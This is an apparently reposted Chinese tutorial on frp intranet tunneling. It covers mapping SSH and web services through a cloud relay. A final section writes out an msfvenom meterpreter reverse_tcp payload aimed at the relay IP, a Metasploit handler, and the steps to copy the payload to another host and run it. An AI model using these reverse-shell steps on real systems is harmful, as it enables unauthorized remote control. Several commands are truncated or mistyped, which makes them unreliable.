内部网渗透本质上也是端口映射。两者都将内部网地址映射到公共网络可访问的地址,端口映射可以直接在路由器上配置,而内部网穿透配置中的端口映射需要客户端和服务器端之间的绑定。在客户端和服务器端之间建立隧道,然后对服务器的访问请求通过隧道转发到内部网主机。这在没有公共网络IP的情况下很常用。
Frp是一种高性能的反向代理应用程序,可以轻松执行Intranet渗透、对外网络服务、tcp、udp、http、https等协议类型。内部网服务可以通过带有公共网络IP节点的中间传输,以安全方便的方式暴露在公共网络中。
# #中文文档地址:
Github下载地址:
Frp包括客户端和服务器,根据安装的主机的系统下载该版本。这将下载两个版本、windows版本和Linux版本。
1、内网SSH服务映射。
通过xshell将Linux版本文件上传到云服务器并解压缩。
解压缩文件
Tar xf
# #文档含义
Frpc客户端程序
客户端范围的配置文件
客户端简单配置文件
Frps服务器端程序
服务器端完整配置文件
查看服务器端简单配置文件简单配置文件,监听端口7000,即服务器端和客户端通信的端口配置。
启动服务器端程序。
# #以简单的配置启动服务器端程序
./frps -c ./
在本地Centos7上解压缩Linux版本文件,并修改客户端简单配置文件。
# # #客户端简单配置文件
[common]
Server_addr=123.456.789.111 ##远程云主机的公共网络IP地址
Server_port=7000 ##服务器端监听端口
[ssh]
Type=TCP ##协议类型
Local_ip=127.0.0.1 ##本地ip地址
Local_port=22 ##本地端口
Remote_port=6000 ##映射到服务器端口的端口启动客户端程序:
# #以简单的配置启动客户端程序
./frpc -c
云主机的服务器端显示成功的日志信息。
>在云主机上查看6000端口的状态,显示已经配置了TCP监听;
通过xshell访问云主机公网ip的6000端口就可以访问内网主机;
2、映射内网Web服务
配置服务端的配置文件,vhost_http_port为http服务访问端口,vhost_https_port为https服务访问端口,此处以http服务为例;
## 配置文件
[common]
bind_port = 7000
vhost_http_port = 8080
配置完成后启动服务端程序;
## 以简易配置启动服务端程序
./frps -c ./
更改客户端的配置文件;
## 配置文件
[common]
server_addr = 123.456.789.111 ## 云主机的公网IP
server_port = 7000 ## 服务端绑定的端口
[web]
type = http
local_port = 80 ## 本地Web服务的端口
custom_domains = www.yourdomain.com ## 解析到公网IP上的域名
启动客户端程序;
## 以简易配置启动客户端程序
./frps -c ./
服务端可以查看到成功链接的日志信息;
访问域名:8080就可以访问本地的Web服务;
3、配置MSF接收来自公网的shell
服务端配置文件不用改变,修改客户端配置文件即可,然后启动客户端程序;
## 配置文件
[common]
server_addr = 123.456.789.111 ## 云主机的公网IP
server_port = 7000 ## 服务端绑定的端口
[msf]
type = tcp
local_port = 4444 ## 本地待监听端口
local_ip = 127.0.0.1
remote_port = 8085 ## 云主机映射端口
生成 payload ,LHOST 指定为公网 IP,LPORT 指定为公网映射端口;
## 使用msfvenom生成payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu
本地启动 MSF 并配置侦听,此时监听LOST为本地ip地址,LPORT为配置文件中本地的端口;
## MSF配置本地监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.105
set LPORT 4444
exploit
将payload复制到另一台Centos中,并执行;
## 复制payload并执行
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu
MSF 成功接收 shell ;
1.《Frp内网穿透》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。
2.《Frp内网穿透》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。
3.文章转载时请保留本站内容来源地址,https://www.lu-xu.com/why/3014313.html